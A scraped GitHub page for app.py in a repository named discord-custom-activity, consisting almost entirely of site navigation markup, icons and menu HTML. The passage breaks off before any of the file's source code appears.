aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 
color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-center flex-items-center p-0 f5 js-jump-to-suggestion"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="m-3 anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </li> </ul> </div> </label> </form> </div> </div> <nav class="d-flex flex-column flex-md-row flex-self-stretch flex-md-self-auto" aria-label="Global"> <a class="Header-link py-md-3 d-block d-md-none py-2 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:dashboard:user" aria-label="Dashboard" href="/dashboard"> Dashboard </a> <a class="js-selected-navigation-item Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-hotkey="g p" data-ga-click="Header, click, Nav menu - item:pulls context:user" aria-label="Pull requests you created" data-selected-links="/pulls /pulls/assigned /pulls/mentioned /pulls" href="/pulls"> Pull<span class="d-inline d-md-none d-lg-inline"> request</span>s </a> <a class="js-selected-navigation-item 
Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-hotkey="g i" data-ga-click="Header, click, Nav menu - item:issues context:user" aria-label="Issues you created" data-selected-links="/issues /issues/assigned /issues/mentioned /issues" href="/issues"> Issues </a> <div class="d-flex position-relative"> <a class="js-selected-navigation-item Header-link flex-auto mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:marketplace context:user" data-octo-click="marketplace_click" data-octo-dimensions="location:nav_bar" data-selected-links=" /marketplace" href="/marketplace"> Marketplace </a> </div> <a class="js-selected-navigation-item Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:explore" data-selected-links="/explore /trending /trending/developers /integrations /integrations/feature/code /integrations/feature/collaborate /integrations/feature/ship showcases showcases_search showcases_landing /explore" href="/explore"> Explore </a> <a class="js-selected-navigation-item Header-link d-block d-md-none py-2 py-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:workspaces context:user" data-selected-links="/codespaces /codespaces" href="/codespaces"> Codespaces </a> <a class="js-selected-navigation-item Header-link d-block d-md-none py-2 py-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:Sponsors" data-hydro-click="{&quot;event_type&quot;:&quot;sponsors.button_click&quot;,&quot;payload&quot;:{&quot;button&quot;:&quot;HEADER_SPONSORS_DASHBOARD&quot;,&quot;sponsorable_login&quot;:&quot;Bomzz06&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" 
data-hydro-click-hmac="bd1bd75996ab4eff9f5b387e38edf22001205b12681e2842dd057d0e48923133" data-selected-links=" /sponsors/accounts" href="/sponsors/accounts">Sponsors</a> <a class="Header-link d-block d-md-none mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade" href="/settings/profile"> Settings </a> <a class="Header-link d-block d-md-none mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade" href="/Bomzz06"> <img class="avatar avatar-user" loading="lazy" decoding="async" src="https://avatars.githubusercontent.com/u/91737103?s=40&amp;v=4" width="20" height="20" alt="@Bomzz06" /> Bomzz06 </a> <!-- '"` --><!-- </textarea></xmp> --></option></form><form action="/logout" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="7CRAnGj7pqObLLiqjYJPpFQeg2cccpPDh0ctdI4Lqo0Hlukm6FXrZK/EIk1HHF4MURwQnRCShkxzFpTKrvK3qg==" /> <button type="submit" class="Header-link mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade d-md-none btn-link d-block width-full text-left" style="padding-left: 2px;" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;sign out&quot;,&quot;label&quot;:&quot;icon:logout&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="c463a3af349de8e5d9dbb16a9542d05b9d2d051ce270dca9bac1fd9137a14c9a" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-sign-out v-align-middle"> <path fill-rule="evenodd" d="M2 2.75C2 1.784 2.784 1 3.75 1h2.5a.75.75 0 010 1.5h-2.5a.25.25 0 00-.25.25v10.5c0 .138.112.25.25.25h2.5a.75.75 0 010 1.5h-2.5A1.75 1.75 0 012 13.25V2.75zm10.44 4.5H6.75a.75.75 0 000 1.5h5.69l-1.97 1.97a.75.75 0 101.06 1.06l3.25-3.25a.75.75 0 000-1.06l-3.25-3.25a.75.75 0 10-1.06 
1.06l1.97 1.97z"></path> </svg> Sign out </button> </form></nav> </div> <div class="Header-item Header-item--full flex-justify-center d-md-none position-relative"> <a class="Header-link " href="https://github.com/" data-hotkey="g d" aria-label="Homepage " data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;go to dashboard&quot;,&quot;label&quot;:&quot;icon:logo&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="4caab5790c0a42a2267601624fa799518e43617bad147991e919699a43f0bf22" > <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github v-align-middle"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> </div> <div class="Header-item mr-0 mr-md-3 flex-order-1 flex-md-order-none"> <notification-indicator class="js-socket-channel" data-test-selector="notifications-indicator" data-channel="eyJjIjoibm90aWZpY2F0aW9uLWNoYW5nZWQ6OTE3MzcxMDMiLCJ0IjoxNjMzMzQ2MTgxfQ==--5e54d272a19096ed553a1610cc3407141ef88eed8ceb8bfdd60a0ad8f63d0370"> <a href="/notifications" class="Header-link notification-indicator position-relative tooltipped tooltipped-sw" aria-label="You have no unread notifications" data-hotkey="g n" 
data-ga-click="Header, go to notifications, icon:read" data-target="notification-indicator.link"> <span class="mail-status " data-target="notification-indicator.modifier"></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path> </svg> </a> </notification-indicator> </div> <div class="Header-item position-relative d-none d-md-flex"> <details class="details-overlay details-reset"> <summary class="Header-link" aria-label="Create new…" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;create new&quot;,&quot;label&quot;:&quot;icon:add&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="5f5a09b269e7a6c9f60268558c0cd09e2184078ca0e24ebb6b686a24fac0dc94" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-plus"> <path fill-rule="evenodd" d="M7.75 2a.75.75 0 01.75.75V7h4.25a.75.75 0 110 1.5H8.5v4.25a.75.75 0 11-1.5 0V8.5H2.75a.75.75 0 010-1.5H7V2.75A.75.75 0 017.75 2z"></path> </svg> <span class="dropdown-caret"></span> </summary> <details-menu class="dropdown-menu dropdown-menu-sw"> <a 
role="menuitem" class="dropdown-item" href="/new" data-ga-click="Header, create new repository"> New repository </a> <a role="menuitem" class="dropdown-item" href="/new/import" data-ga-click="Header, import a repository"> Import repository </a> <a role="menuitem" class="dropdown-item" href="https://gist.github.com/" data-ga-click="Header, create new gist"> New gist </a> <a role="menuitem" class="dropdown-item" href="/organizations/new" data-ga-click="Header, create new organization"> New organization </a> </details-menu> </details> </div> <div class="Header-item position-relative mr-0 d-none d-md-flex"> <details class="details-overlay details-reset js-feature-preview-indicator-container" data-feature-preview-indicator-src="/users/Bomzz06/feature_preview/indicator_check"> <summary class="Header-link" aria-label="View profile and more" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;show menu&quot;,&quot;label&quot;:&quot;icon:avatar&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="28010ab2db5d0607297200310a6b073105d38e1e90c184d9c408d3e208df889e" > <img src="https://avatars.githubusercontent.com/u/91737103?s=40&amp;v=4" alt="@Bomzz06" size="20" height="20" width="20" data-view-component="true" class="avatar-user avatar avatar-small"></img> <span class="feature-preview-indicator js-feature-preview-indicator" style="top: 1px;" hidden></span> <span class="dropdown-caret"></span> </summary> <details-menu class="dropdown-menu dropdown-menu-sw" style="width: 180px" src="/users/91737103/menu" preload> <include-fragment> <p class="text-center mt-3" data-hide-on-error> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle 
cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </p> <p class="ml-1 mb-2 mt-2 color-text-primary" data-show-on-error> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> Sorry, something went wrong. </p> </include-fragment> </details-menu> </details> </div> </header> </div> <div id="start-of-content" class="show-on-focus"></div> <div data-pjax-replace id="js-flash-container"> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> <div>{{ message }}</div> </div> </div> </template> </div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope 
itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container > <div id="repository-container-header" class="hx_page-header-bg pt-3 hide-full-screen mb-5" data-pjax-replace> <div class="d-flex mb-3 px-3 px-md-4 px-lg-5"> <div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <span class="author flex-self-stretch" itemprop="author"> <a class="url fn" rel="author" data-hovercard-type="user" data-hovercard-url="/users/agambajwa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/agambajwa">agambajwa</a> </span> <span class="mx-1 flex-self-stretch color-text-secondary">/</span> <strong itemprop="name" class="mr-2 flex-self-stretch"> <a data-pjax="#js-repo-pjax-container" href="/agambajwa/discord-custom-activity">discord-custom-activity</a> </strong> <span></span><span class="Label Label--secondary v-align-middle mr-1">Public</span> </h1> </div> <ul class="pagehead-actions flex-shrink-0 d-none d-md-inline" style="padding: 2px 0;"> <li> <notifications-list-subscription-form class="f5 position-relative d-flex"> <details class="details-reset details-overlay f5 position-relative" data-target="notifications-list-subscription-form.details" data-action="toggle:notifications-list-subscription-form#detailsToggled" > <summary class="btn btn-sm 
rounded-right-0" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;WATCH_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0fb560a2317ad347e2cbc363b6cb6c00bf2246de638afe04d1f19de85667d64c" data-ga-click="Repository, click Watch settings, action:blob#show" aria-label="Notifications settings"> <span data-menu-button> <span hidden data-target="notifications-list-subscription-form.unwatchButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-eye"> <path fill-rule="evenodd" d="M1.679 7.932c.412-.621 1.242-1.75 2.366-2.717C5.175 4.242 6.527 3.5 8 3.5c1.473 0 2.824.742 3.955 1.715 1.124.967 1.954 2.096 2.366 2.717a.119.119 0 010 .136c-.412.621-1.242 1.75-2.366 2.717C10.825 11.758 9.473 12.5 8 12.5c-1.473 0-2.824-.742-3.955-1.715C2.92 9.818 2.09 8.69 1.679 8.068a.119.119 0 010-.136zM8 2c-1.981 0-3.67.992-4.933 2.078C1.797 5.169.88 6.423.43 7.1a1.619 1.619 0 000 1.798c.45.678 1.367 1.932 2.637 3.024C4.329 13.008 6.019 14 8 14c1.981 0 3.67-.992 4.933-2.078 1.27-1.091 2.187-2.345 2.637-3.023a1.619 1.619 0 000-1.798c-.45-.678-1.367-1.932-2.637-3.023C11.671 2.992 9.981 2 8 2zm0 8a2 2 0 100-4 2 2 0 000 4z"></path> </svg> Unwatch </span> <span hidden data-target="notifications-list-subscription-form.stopIgnoringButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell-slash"> <path fill-rule="evenodd" d="M8 1.5c-.997 0-1.895.416-2.534 1.086A.75.75 0 014.38 1.55 5 5 0 0113 5v2.373a.75.75 0 01-1.5 0V5A3.5 3.5 0 008 1.5zM4.182 4.31L1.19 2.143a.75.75 0 10-.88 1.214L3 5.305v2.642a.25.25 0 01-.042.139L1.255 10.64A1.518 1.518 0 002.518 13h11.108l1.184.857a.75.75 0 
10.88-1.214l-1.375-.996a1.196 1.196 0 00-.013-.01L4.198 4.321a.733.733 0 00-.016-.011zm7.373 7.19L4.5 6.391v1.556c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01.015.015 0 00.005.012.017.017 0 00.006.004l.007.001h9.037zM8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path> </svg> Stop ignoring </span> <span data-target="notifications-list-subscription-form.watchButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-eye"> <path fill-rule="evenodd" d="M1.679 7.932c.412-.621 1.242-1.75 2.366-2.717C5.175 4.242 6.527 3.5 8 3.5c1.473 0 2.824.742 3.955 1.715 1.124.967 1.954 2.096 2.366 2.717a.119.119 0 010 .136c-.412.621-1.242 1.75-2.366 2.717C10.825 11.758 9.473 12.5 8 12.5c-1.473 0-2.824-.742-3.955-1.715C2.92 9.818 2.09 8.69 1.679 8.068a.119.119 0 010-.136zM8 2c-1.981 0-3.67.992-4.933 2.078C1.797 5.169.88 6.423.43 7.1a1.619 1.619 0 000 1.798c.45.678 1.367 1.932 2.637 3.024C4.329 13.008 6.019 14 8 14c1.981 0 3.67-.992 4.933-2.078 1.27-1.091 2.187-2.345 2.637-3.023a1.619 1.619 0 000-1.798c-.45-.678-1.367-1.932-2.637-3.023C11.671 2.992 9.981 2 8 2zm0 8a2 2 0 100-4 2 2 0 000 4z"></path> </svg> Watch </span> </span> <span class="dropdown-caret"></span> </summary> <details-menu class="SelectMenu " role="menu" data-target="notifications-list-subscription-form.menu" > <div class="SelectMenu-modal notifications-component-menu-modal"> <header class="SelectMenu-header"> <h3 class="SelectMenu-title">Notifications</h3> <button class="SelectMenu-closeButton" type="button" aria-label="Close menu" data-action="click:notifications-list-subscription-form#closeMenu"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 
9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> </header> <div class="SelectMenu-list"> <form data-target="notifications-list-subscription-form.form" data-action="submit:notifications-list-subscription-form#submitForm" action="/notifications/subscribe" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="3ZqUffXIzoqG5w2XIHAesd3nzNWGsbYI14zeB/aLcycZrWVHDOzMus5mw4ZYgydJy3bl9mjcHNRNkIxbtVYSrA==" autocomplete="off" /> <input type="hidden" name="repository_id" value="298526344"> <button type="submit" name="do" value="included" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="true" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> Participating and @mentions </div> <div class="text-small color-text-secondary text-normal pb-1"> Only receive notifications from this repository when participating or @mentioned. 
</div> </div> </button> <button type="submit" name="do" value="subscribed" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="false" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> All Activity </div> <div class="text-small color-text-secondary text-normal pb-1"> Notified of all notifications on this repository. </div> </div> </button> <button type="submit" name="do" value="ignore" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="false" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> Ignore </div> <div class="text-small color-text-secondary text-normal pb-1"> Never be notified. 
</div> </div> </button> </form> <button class="SelectMenu-item flex-items-start pr-3" type="button" role="menuitemradio" data-target="notifications-list-subscription-form.customButton" data-action="click:notifications-list-subscription-form#openCustomDialog" aria-haspopup="true" aria-checked="false" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="d-flex flex-items-start flex-justify-between"> <div class="f5 text-bold">Custom</div> <div class="f5 pr-1"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-right"> <path fill-rule="evenodd" d="M8.22 2.97a.75.75 0 011.06 0l4.25 4.25a.75.75 0 010 1.06l-4.25 4.25a.75.75 0 01-1.06-1.06l2.97-2.97H3.75a.75.75 0 010-1.5h7.44L8.22 4.03a.75.75 0 010-1.06z"></path> </svg> </div> </div> <div class="text-small color-text-secondary text-normal pb-1"> Select events you want to be notified of in addition to participating and @mentions. 
</div> </div> </button> <div class="px-3 py-2 d-flex color-bg-secondary flex-items-center"> <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-mobile SelectMenu-icon SelectMenu-icon--device-mobile"> <path fill-rule="evenodd" d="M3.75 0A1.75 1.75 0 002 1.75v12.5c0 .966.784 1.75 1.75 1.75h8.5A1.75 1.75 0 0014 14.25V1.75A1.75 1.75 0 0012.25 0h-8.5zM3.5 1.75a.25.25 0 01.25-.25h8.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25h-8.5a.25.25 0 01-.25-.25V1.75zM8 13a1 1 0 100-2 1 1 0 000 2z"></path> </svg> </span> <span className="text-small color-text-secondary text-normal pb-1"> Get push notifications on <a target="_blank" rel="noopener noreferrer" href="https://apps.apple.com/app/apple-store/id1477376905?ct=watch-dropdown&amp;mt=8&amp;pt=524675">iOS</a> or <a target="_blank" rel="noopener noreferrer" href="https://play.google.com/store/apps/details?id=com.github.android&amp;referrer=utm_campaign%3Dwatch-dropdown%26utm_medium%3Dweb%26utm_source%3Dgithub">Android</a>. 
</span> </div> </div> </div> </details-menu> <details-dialog class="notifications-component-dialog " data-target="notifications-list-subscription-form.customDialog" hidden> <div class="SelectMenu-modal notifications-component-dialog-modal overflow-visible"> <form data-target="notifications-list-subscription-form.customform" data-action="submit:notifications-list-subscription-form#submitCustomForm" action="/notifications/subscribe" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="B5KeWY/J7AWLIwERLJheXkUJmk2gzdVgu6NQMebrvkjDpW9jdu3uNcOizwBUa2emU5izbk6gf7whvwJtpTbfww==" autocomplete="off" /> <input type="hidden" name="repository_id" value="298526344"> <header class="d-sm-none SelectMenu-header pb-0 border-bottom-0 px-2 px-sm-3"> <h1 class="f3 SelectMenu-title d-inline-flex"> <button class="color-bg-primary border-0 px-2 py-0 m-0 Link--secondary f5" aria-label="Return to menu" type="button" data-action="click:notifications-list-subscription-form#closeCustomDialog" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-left"> <path fill-rule="evenodd" d="M7.78 12.53a.75.75 0 01-1.06 0L2.47 8.28a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 1.06L4.81 7h7.44a.75.75 0 010 1.5H4.81l2.97 2.97a.75.75 0 010 1.06z"></path> </svg> </button> Custom </h1> </header> <header class="d-none d-sm-flex flex-items-start pt-1"> <button class="border-0 px-2 pt-1 m-0 Link--secondary f5" style="background-color: transparent;" aria-label="Return to menu" type="button" data-action="click:notifications-list-subscription-form#closeCustomDialog" > <svg style="position: relative; left: 2px; top: 1px" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-left"> <path fill-rule="evenodd" d="M7.78 12.53a.75.75 0 01-1.06 0L2.47 8.28a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 1.06L4.81 7h7.44a.75.75 0 
